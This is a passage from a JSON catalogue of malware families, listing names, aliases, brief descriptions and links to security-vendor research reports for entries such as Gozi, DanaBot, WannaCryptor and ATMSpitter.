"http://contagiodump.blogspot.com/2010/07/zeus-version-scheme-by-trojan-author.html",
"http://malwareint.blogspot.com/2010/02/facebook-phishing-campaign-proposed-by.html",
"http://malwareint.blogspot.com/2010/02/zeus-on-irs-scam-remains-actively.html",
"http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html",
"http://eternal-todo.com/blog/new-zeus-binary",
"http://contagiodump.blogspot.com/2010/07/zeus-trojan-research-links.html",
"https://www.symantec.com/connect/blogs/spyeye-s-kill-zeus-bark-worse-its-bite",
"https://nakedsecurity.sophos.com/2010/07/24/sample-run/",
"https://www.mnin.org/write/ZeusMalware.pdf",
"https://www.symantec.com/connect/blogs/brief-look-zeuszbot-20",
"http://malwareint.blogspot.com/2010/01/leveraging-zeus-to-send-spam-through.html",
"http://eternal-todo.com/blog/zeus-spreading-facebook",
"http://malwareint.blogspot.com/2010/03/new-phishing-campaign-against-facebook.html",
"http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/zeus_king_of_bots.pdf",
"http://eternal-todo.com/blog/detecting-zeus",
"https://www.secureworks.com/research/zeus?threat=zeus",
"http://malwareint.blogspot.com/2009/07/special-zeus-botnet-for-dummies.html"
]
}
},
{
"uuid": "467ee29c-317f-481a-a77c-69961eb88c4d",
"value": "Simda",
"description": "",
"meta": {
"synonyms": [
"iBank"
],
"type": [],
"refs": [
"https://secrary.com/ReversingMalware/iBank/"
]
}
},
{
"uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7",
"value": "MacSpy",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service"
]
}
},
{
"uuid": "118ced99-5942-497f-885a-2b25d0569b4b",
"value": "Matrix Ransom",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "6e668c0c-7085-4951-87d4-0334b6a5cdb3",
"value": "Shifu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/01/unit42-2016-updates-shifu-banking-trojan/"
]
}
},
{
"uuid": "fe187c8a-25d4-4d30-bd43-efca18d527f0",
"value": "Slocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/slocker-mobile-ransomware-starts-mimicking-wannacry/"
]
}
},
{
"uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a",
"value": "DanaBot",
"description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBots modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. ",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/",
"https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0"
]
}
},
{
"uuid": "2c51a717-726b-4813-9fcc-1265694b128e",
"value": "Jaff",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://malware-traffic-analysis.net/2017/05/16/index.html",
"https://www.proofpoint.com/us/threat-insight/post/jaff-new-ransomware-from-actors-behind-distribution-of-dridex-locky-bart",
"http://blog.talosintelligence.com/2017/05/jaff-ransomware.html"
]
}
},
{
"uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf",
"value": "CryLocker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "38cbdc29-a5af-46ae-ab82-baf3f6999826",
"value": "MazarBot",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://b0n1.blogspot.de/2017/08/phishing-attack-at-raiffeisen-bank-by.html",
"https://heimdalsecurity.com/blog/security-alert-mazar-bot-active-attacks-android-malware/"
]
}
},
{
"uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8",
"value": "Cobian RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html",
"https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat"
]
}
},
{
"uuid": "59717468-271e-4d15-859a-130681c17ddb",
"value": "Matrix Banker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/another-banker-enters-matrix/"
]
}
},
{
"uuid": "537f17ac-74e5-440b-8659-d4fdb4af41a6",
"value": "HeroRAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.welivesecurity.com/2018/06/18/new-telegram-abusing-android-rat/"
]
}
},
{
"uuid": "5c5beab9-614c-4c86-b369-086234ddb43c",
"value": "PowerWare",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats"
]
}
},
{
"uuid": "ed0b8ac9-973b-4aaa-9904-8c7ed2e73933",
"value": "FileIce",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/in-dev-ransomware-forces-you-do-to-survey-before-unlocking-computer/"
]
}
},
{
"uuid": "44a1706e-f6dc-43ea-ac85-9a4f2407b9a3",
"value": "Ice IX",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blog.trendmicro.com/trendlabs-security-intelligence/zeus-gets-another-update/",
"https://securelist.com/ice-ix-not-cool-at-all/29111/",
"https://www.virusbulletin.com/virusbulletin/2012/08/inside-ice-ix-bot-descendent-zeus"
]
}
},
{
"uuid": "d26b5518-8d7f-41a6-b539-231e4962853e",
"value": "Komplex",
"description": "",
"meta": {
"synonyms": [
"JHUHUGIT",
"JKEYSKW",
"SedUploader"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"https://objective-see.com/blog/blog_0x16.html",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
"http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/"
]
}
},
{
"uuid": "75329c9e-a218-4299-87b2-8f667cd9e40c",
"value": "Gozi",
"description": "2000 Ursnif aka Snifula\r\n2006 Gozi v1.0, Gozi CRM, CRM, Papras\r\n2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*)\r\n-> 2010 Gozi Prinimalka -> Vawtrak/Neverquest\r\n\r\nIn 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed.\r\nIt was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.\r\n\r\nIn September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.",
"meta": {
"synonyms": [
"Ursnif",
"Snifula",
"Gozi CRM",
"Papras",
"CRM"
],
"type": [],
"refs": [
"http://blog.malwaremustdie.org/2013/02/the-infection-of-styx-exploit-kit.html",
"https://www.secureworks.com/research/gozi",
"https://lokalhost.pl/gozi_tree.txt",
"https://blog.gdatasoftware.com/2016/11/29325-analysis-ursnif-spying-on-your-data-since-2007",
"http://researchcenter.paloaltonetworks.com/2017/02/unit42-banking-trojans-ursnif-global-distribution-networks-identified/"
]
}
},
{
"uuid": "c4afb7c6-cfba-40d7-aa79-a2829828ed92",
"value": "Gameover DGA",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "98bcb2b9-bc3a-4ffb-859a-94bd03c1cc3c",
"value": "Radamant",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.cyphort.com/radamant-ransomware-distributed-via-rig-ek/"
]
}
},
{
"uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1",
"value": "Winnti",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/TKCERT/winnti-suricata-lua",
"http://blog.trendmicro.com/trendlabs-security-intelligence/winnti-abuses-github/",
"https://github.com/TKCERT/winnti-nmap-script",
"https://www.protectwise.com/blog/winnti-evolution-going-open-source.html",
"https://github.com/TKCERT/winnti-detector",
"http://blog.trendmicro.com/trendlabs-security-intelligence/pigs-malware-examining-possible-member-winnti-group/"
]
}
},
{
"uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd",
"value": "QRat",
"description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.",
"meta": {
"synonyms": [
"Quaverse RAT"
],
"type": [],
"refs": [
"https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/",
"https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market",
"https://www.digitrustgroup.com/java-rat-qrat/"
]
}
},
{
"uuid": "7ea00126-add3-407e-b69d-d4aa1b3049d5",
"value": "Derusbi",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.virusbulletin.com/uploads/pdf/conference_slides/2015/Pun-etal-VB2015.pdf",
"http://www.novetta.com/wp-content/uploads/2014/11/Derusbi.pdf",
"https://www.threatconnect.com/the-anthem-hack-all-roads-lead-to-china/"
]
}
},
{
"uuid": "dcabea75-a433-4157-bb7a-be76de3026ac",
"value": "Careto",
"description": "",
"meta": {
"synonyms": [
"Appetite",
"Mask"
],
"type": [],
"refs": [
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
]
}
},
{
"uuid": "fa5fdfd2-8142-43f5-9b48-d1033b5398c8",
"value": "Triada",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.nowsecure.com/blog/2016/11/21/android-malware-analysis-radare-triada-trojan/",
"https://blog.checkpoint.com/2016/06/17/in-the-wild-mobile-malware-implements-new-features/",
"https://securelist.com/everyone-sees-not-what-they-want-to-see/74997/",
"https://securelist.com/attack-on-zygote-a-new-twist-in-the-evolution-of-mobile-threats/74032/",
"http://contagiominidump.blogspot.de/2016/07/android-triada-modular-trojan.html"
]
}
},
{
"uuid": "c4490972-3403-4043-9d61-899c0a440940",
"value": "EquationDrug",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/inside-the-equationdrug-espionage-platform/69203/",
"https://cdn.securelist.com/files/2015/02/Equation_group_questions_and_answers.pdf",
"https://securelist.com/equation-the-death-star-of-malware-galaxy/68750/",
"http://artemonsecurity.blogspot.com/2017/03/equationdrug-rootkit-analysis-mstcp32sys.html"
]
}
},
{
"uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500",
"value": "elf.vpnfilter",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected",
"https://blog.talosintelligence.com/2018/05/VPNFilter.html",
"https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1",
"https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware",
"https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/"
]
}
},
{
"uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840",
"value": "Penquin Turla",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf",
"https://twitter.com/juanandres_gs/status/944741575837528064",
"https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf"
]
}
},
{
"uuid": "3afecded-3461-45f9-8159-e8328e56a916",
"value": "IDKEY",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://isc.sans.edu/diary/22766"
]
}
},
{
"uuid": "8060dbdc-cf31-40bc-9900-eb8119423c50",
"value": "Catchamas",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets"
]
}
},
{
"uuid": "42ed9fc4-08ba-4c1c-bf15-d789ee4e3ca6",
"value": "BillGates",
"description": "BillGates is a modularized malware, of supposedly Chinese origin. Its main functionality is to perform DDoS attacks, with support for DNS amplification. Often, BillGates is delivered with one or many backdoor modules.\r\n\r\nBillGates is available for *nix-based systems as well as for Windows.\r\n\r\nOn Windows, the (Bill)Gates installer typically contains the various modules as linked resources.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securelist.com/versatile-ddos-trojan-for-linux/64361/",
"https://habrahabr.ru/post/213973/",
"https://www.akamai.com/kr/ko/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf"
]
}
},
{
"uuid": "66781866-f064-467d-925d-5e5f290352f0",
"value": "Feodo",
"description": "",
"meta": {
"synonyms": [
"Bugat",
"Cridex"
],
"type": [],
"refs": [
"http://contagiodump.blogspot.com/2012/08/cridex-analysis-using-volatility-by.html",
"https://securelist.com/analysis/publications/78531/dridex-a-history-of-evolution/",
"http://www.sempersecurus.org/2012/08/cridex-analysis-using-volatility.html"
]
}
},
{
"uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a",
"value": "XSLCmd",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html"
]
}
},
{
"uuid": "df320366-7970-4af0-b1f4-9f9492dede53",
"value": "Mamba",
"description": "",
"meta": {
"synonyms": [
"HDDCryptor",
"DiskCryptor"
],
"type": [],
"refs": [
"https://securelist.com/the-return-of-mamba-ransomware/79403/",
"http://blog.trendmicro.com/trendlabs-security-intelligence/bksod-by-ransomware-hddcryptor-uses-commercial-tools-to-encrypt-network-shares-and-lock-hdds/"
]
}
},
{
"uuid": "e6a077cb-42cc-4193-9006-9ceda8c0dff2",
"value": "Downdelph",
"description": "",
"meta": {
"synonyms": [
"DELPHACY"
],
"type": [],
"refs": [
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
"http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf"
]
}
},
{
"uuid": "4e3fa4e6-bc7d-4024-b191-ccafa5347c13",
"value": "AscentLoader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "771113e1-8550-4dc2-b2ad-7298ae381cb5",
"value": "Mutabaha",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://vms.drweb.ru/virus/?_is=1&i=8477920"
]
}
},
{
"uuid": "ed9f995b-1b41-4b83-a978-d956670fdfbe",
"value": "UrlZone",
"description": "",
"meta": {
"synonyms": [
"Shiotob",
"Bebloh"
],
"type": [],
"refs": [
"https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations",
"https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/",
"https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/",
"https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html",
"https://www.arbornetworks.com/blog/asert/an-update-on-the-urlzone-banker/",
"https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan",
"https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/"
]
}
},
{
"uuid": "ac2af862-34f4-4ced-9247-e3eeef1ad7d9",
"value": "WireLurker",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x16.html",
"https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf"
]
}
},
{
"uuid": "52acea22-7d88-433c-99e6-8fef1657e3ad",
"value": "Chrysaor",
"description": "",
"meta": {
"synonyms": [
"JigglyPuff",
"Pegasus"
],
"type": [],
"refs": [
"https://info.lookout.com/rs/051-ESQ-475/images/lookout-pegasus-android-technical-analysis.pdf",
"https://android-developers.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html",
"https://media.ccc.de/v/33c3-7901-pegasus_internals",
"https://security.googleblog.com/2017/04/an-investigation-of-chrysaor-malware-on.html"
]
}
},
{
"uuid": "ba7706c1-7d2a-4031-9acc-cb862860da1a",
"value": "Cerbu",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "ad67ff31-2a02-43f9-8b12-7df7e4fcccd6",
"value": "WannaCryptor",
"description": "",
"meta": {
"synonyms": [
"Wana Decrypt0r",
"Wcry",
"WannaCry"
],
"type": [],
"refs": [
"https://blog.avast.com/ransomware-that-infected-telefonica-and-nhs-hospitals-is-spreading-aggressively-with-over-50000-attacks-so-far-today",
"https://baesystemsai.blogspot.de/2017/05/wanacrypt0r-ransomworm.html",
"http://www.independent.co.uk/news/uk/home-news/wannacry-malware-hack-nhs-report-cybercrime-north-korea-uk-ben-wallace-a8022491.html",
"https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168",
"https://blog.comae.io/wannacry-new-variants-detected-b8908fefea7e",
"https://blog.comae.io/wannacry-the-largest-ransom-ware-infection-in-history-f37da8e30a58",
"https://themoscowtimes.com/news/wcry-virus-reportedly-infects-russian-interior-ministrys-computer-network-57984",
"https://krebsonsecurity.com/2017/05/u-k-hospitals-hit-in-widespread-ransomware-attack/",
"https://securelist.com/blog/incidents/78351/wannacry-ransomware-used-in-widespread-attacks-all-over-the-world/",
"https://www.malwaretech.com/2017/05/how-to-accidentally-stop-a-global-cyber-attacks.html",
"https://www.symantec.com/connect/blogs/wannacry-ransomware-attacks-show-strong-links-lazarus-group",
"https://blog.gdatasoftware.com/2017/05/29751-wannacry-ransomware-campaign",
"https://blog.malwarebytes.com/cybercrime/2017/05/how-did-wannacry-ransomworm-spread/",
"https://www.flashpoint-intel.com/blog/linguistic-analysis-wannacry-ransomware/",
"http://blog.emsisoft.com/2017/05/12/wcry-ransomware-outbreak/",
"https://blog.comae.io/wannacry-decrypting-files-with-wanakiwi-demo-86bafb81112d"
]
}
},
{
"uuid": "b1cc4c79-30a5-485d-bd7f-8625c1cb5956",
"value": "Unidentified 013 (Korean)",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintelligence.com/2017/02/korean-maldoc.html"
]
}
},
{
"uuid": "7fd96553-4c78-43de-824f-82645ed4fac5",
"value": "Ordinypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/",
"https://www.gdata.de/blog/2017/11/30151-ordinypt"
]
}
},
{
"uuid": "1d451231-8b27-4250-b3db-55c5c8ea99cb",
"value": "xxmm",
"description": "",
"meta": {
"synonyms": [
"ShadowWalker"
],
"type": [],
"refs": [
"http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/",
"https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses"
]
}
},
{
"uuid": "805b99d1-233d-4f7f-b343-440e5d507494",
"value": "Rambo",
"description": "",
"meta": {
"synonyms": [
"brebsd"
],
"type": [],
"refs": [
"https://www.morphick.com/resources/news/deep-dive-dragonok-rambo-backdoor"
]
}
},
{
"uuid": "bf135b0a-3120-42c4-ba58-c80f9ef689bf",
"value": "Arefty",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/"
]
}
},
{
"uuid": "c4346ed0-1d74-4476-a78c-299bce0409bd",
"value": "FireCrypt",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.bleepingcomputer.com/news/security/firecrypt-ransomware-comes-with-a-ddos-component/"
]
}
},
{
"uuid": "f9b3757e-99c7-4999-8b79-87609407f895",
"value": "Kuluoz",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872",
"value": "LockPOS",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/",
"https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html",
"https://www.cyberbit.com/new-lockpos-malware-injection-technique/"
]
}
},
{
"uuid": "22a686d8-dd35-4a29-9437-b0ce7b5c204b",
"value": "Unidentified 028",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "21540126-d0bb-42ce-9b93-341fedb94cac",
"value": "Tsunami",
"description": "",
"meta": {
"synonyms": [
"Radiation",
"Amnesia"
],
"type": [],
"refs": [
"http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/",
"http://get.cyberx-labs.com/radiation-report",
"https://www.8ackprotect.com/blog/big_brother_is_attacking_you"
]
}
},
{
"uuid": "c8e8392f-883e-412e-9b0b-02137d0875da",
"value": "Nymaim2",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://johannesbader.ch/2018/04/the-new-domain-generation-algorithm-of-nymaim/"
]
}
},
{
"uuid": "f9aa9004-8811-4091-a471-38f81dbcadc4",
"value": "Nanocore RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2017/09/apt33-insights-into-iranian-cyber-espionage.html",
"https://www.bleepingcomputer.com/news/security/nanocore-rat-author-gets-33-months-in-prison/"
]
}
},
{
"uuid": "1fb57e31-b97e-45c3-a922-a49ed6dd966d",
"value": "homefry",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html"
]
}
},
{
"uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf",
"value": "Coldroot RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://objective-see.com/blog/blog_0x2A.html"
]
}
},
{
"uuid": "8c95cb51-1044-4dcd-9cac-ad9f2e3b9070",
"value": "iSpy Keylogger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.zscaler.com/blogs/research/ispy-keylogger"
]
}
},
{
"uuid": "48cb12ee-c60a-46cd-b376-39226027c616",
"value": "Mewsei",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187",
"value": "ATMSpitter",
"description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf",
"https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf"
]
}
},
{
"uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8",
"value": "Patcher",
"description": "",
"meta": {
"synonyms": [
"Findzip"
],
"type": [],
"refs": [
"http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/"
]
}
},
{
"uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09",
"value": "Cueisfry",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761"
]
}
},
{
"uuid": "b614f291-dbf8-49ed-b110-b69ab6e8c6e5",
"value": "Unidentified 051",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://twitter.com/CDA/status/1014144988454772736"
]
}
},
{
"uuid": "04aeda9f-7923-45d1-ab74-9dddd8612d47",
"value": "Bundestrojaner",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://www.stoned-vienna.com/analysis-of-german-bundestrojaner.html",
"http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf"
]
}
},
{
"uuid": "9d0ddcb9-b0da-436a-af73-d9307609bd17",
"value": "GreenShaitan",
"description": "",
"meta": {
"synonyms": [
"eoehttp"
],
"type": [],
"refs": [
"https://blog.cylance.com/spear-a-threat-actor-resurfaces"
]
}
},
{
"uuid": "b4c33277-ec15-4bb3-89ef-314ecfa100da",
"value": "Misfox",
"description": "",
"meta": {
"synonyms": [
"ModPack",
"MixFox"
],
"type": [],
"refs": []
}
},
{
"uuid": "0ecf5aca-05ef-47fb-b114-9f4177faace3",
"value": "H1N1 Loader",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://blogs.cisco.com/security/h1n1-technical-analysis-reveals-new-capabilities"
]
}
},
{
"uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba",
"value": "Client Maximus",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/"
]
}
},
{
"uuid": "b1fc66de-fda7-4f0c-af00-751d334444b3",
"value": "ZooPark",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/03114450/ZooPark_for_public_final_edit.pdf",
"https://securelist.com/whos-who-in-the-zoo/85394"
]
}
},
{
"uuid": "696d78cb-1716-4ca0-b678-c03c7cfec19a",
"value": "SamSam",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.sophos.com/en-us/medialibrary/pdfs/technical-papers/samsam-ransomware-chooses-its-targets-carefully-wpna.aspx",
"https://www.crowdstrike.com/blog/an-in-depth-analysis-of-samsam-ransomware-and-boss-spider/",
"https://nakedsecurity.sophos.com/2018/05/01/samsam-ransomware-a-mean-old-dog-with-a-nasty-new-trick-report/",
"http://blog.talosintel.com/2016/03/samsam-ransomware.html",
"http://blog.talosintelligence.com/2018/01/samsam-evolution-continues-netting-over.html"
]
}
},
{
"uuid": "7d69892e-d582-4545-8798-4a9a84a821ea",
"value": "Kelihos",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://www.crowdstrike.com/blog/inside-the-takedown-of-zombie-spider-and-the-kelihos-botnet/",
"https://www.wired.com/2017/04/fbi-took-russias-spam-king-massive-botnet/",
"https://www.cyberscoop.com/doj-kelihos-botnet-peter-levashov-severa/",
"https://en.wikipedia.org/wiki/Kelihos_botnet"
]
}
},
{
"uuid": "826c31ca-2617-47e4-b236-205da3881182",
"value": "Reaver",
"description": "Reaver is a type of malware discovered by researchers at Palo Alto Networks in November 2017, but its activity dates back to at least late 2016. Researchers identified only ten unique samples of the malware, indicating limited use, and three different variants, noted as versions 1, 2, and 3. The malware is unique as its final payload masquerades as a control panel link (CPL) file. The intended targets of this activity are unknown as of this writing; however, it was used concurrently with the SunOrcal malware and the same C2 infrastructure used by threat actors who primarily target based on the \"Five Poisons\" - five perceived threats deemed dangerous to, and working against the interests of, the Chinese government.",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/"
]
}
},
{
"uuid": "37f66fcc-e093-4d97-902d-c96602a7d234",
"value": "owaauth",
"description": "",
"meta": {
"synonyms": [
"luckyowa"
],
"type": [],
"refs": [
"https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/"
]
}
},
{
"uuid": "1c3ee140-8c47-4aa7-9723-334ccd886c4e",
"value": "Trochilus RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://github.com/5loyd/trochilus/",
"https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf",
"https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf"
]
}
},
{
"uuid": "587eff78-47be-4022-a1b5-7857340a9ab2",
"value": "AthenaGo RAT",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"http://blog.talosintel.com/2017/02/athena-go.html"
]
}
},
{
"uuid": "858a2cdb-9c89-436a-b8d4-60c725c7ac63",
"value": "SquirtDanger",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": [
"https://researchcenter.paloaltonetworks.com/2018/04/unit42-squirtdanger-swiss-army-knife-malware-veteran-malware-author-thebottle/"
]
}
},
{
"uuid": "ba014661-d1d4-4a69-a698-9f4120de9260",
"value": "Unidentified 035",
"description": "",
"meta": {
"synonyms": [],
"type": [],
"refs": []
}
},
{
"uuid": "bbfd4fb4-3e5a-43bf-b4bb-eaf5ef4fb25f",
"value": "Volgmer",
"description": "",
"meta": {
"synonyms": [
"FALLCHILL",
"Manuscrypt"
],
"type": [],
"refs": [
"https://www.us-cert.gov/ncas/alerts/TA17-318B"
]
}
},
{
"uuid": "41177275-7e6d-4ebd-a4df-d2cc733f7791",
"value": "MBRlock",
"description": " This ransomware modifies the master boot record of the victim's computer so that it shows a ransom note before Windows starts.",
"meta": {
